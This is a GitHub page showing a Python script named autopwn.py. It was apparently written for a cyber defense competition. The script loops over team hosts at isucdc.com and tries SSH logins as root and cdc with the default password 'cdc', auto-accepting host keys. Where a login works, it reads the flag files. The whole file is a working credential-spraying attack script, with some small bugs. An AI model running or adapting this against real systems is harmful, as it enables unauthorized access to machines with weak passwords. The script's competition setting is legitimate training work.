-
Notifications
You must be signed in to change notification settings - Fork 0
/
autopwn.py
executable file
·74 lines (59 loc) · 2.11 KB
/
autopwn.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
#!/usr/bin/python
import os
import sys
import paramiko
userList = [ "root", "cdc" ]
machines = [ ["www","/root/*flag"] ] #, ["crane", "/etc/ssh/*flag"],["security", "/etc/ssh/*flag"], ["generator", "/etc/ssh/*flag"] ]
numTeams = 30
paramiko.util.log_to_file("demo_simple.log")
#paramiko.client.set_missing_host_key_policy(paramiko.client.AutoAddPolicy)
#sshClient = paramiko.client.SSHClient()
def parseName(machineName):
name = machineName.split(".")
print(name[0])
return(name[0])
def captureFlag(machineName, machineIndex, sshclient):
filename = machines[machineIndex][1]
command = "cat " + filename
print(command)
ssh_stdin, ssh_stdout, ssh_stderr = sshclient.exec_command(command)
print("Flag from " + machineName + ": ")
print(ssh_stdout.readlines())
def tryDefaultCreds(machineName, machineIndex):
print("Trying to ssh to " + machineName)
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.client.AutoAddPolicy())
sshClient = client
for user in userList:
try:
sshClient.connect(machineName, port=22, username=user, password="cdc", timeout=60)
print("default creds worked for user " + user)
captureFlag(machineName,machineIndex, sshClient)
sshClient.close()
break
except paramiko.SSHException as e:
print("connection failed")
print(e)
finally:
break
print()
def findMachines():
for n in range(1,30):
index = 0
for machine in machines[:]:
print("searching for "+ machine[0] + " in team" + str(n))
machineName = machine[0] + ".team" + str(n) + ".isucdc.com"
print machineName
tryDefaultCreds(machineName, index)
index += 1
#response = pyping.ping(machineName)
#if response.ret_code == 0:
# print("reachable")
# tryDefaultCreds(machineName)
#else:
# print("unreachable")
def main():
print("Running 2019 autopwn script\n")
findMachines()
if __name__ == '__main__':
main()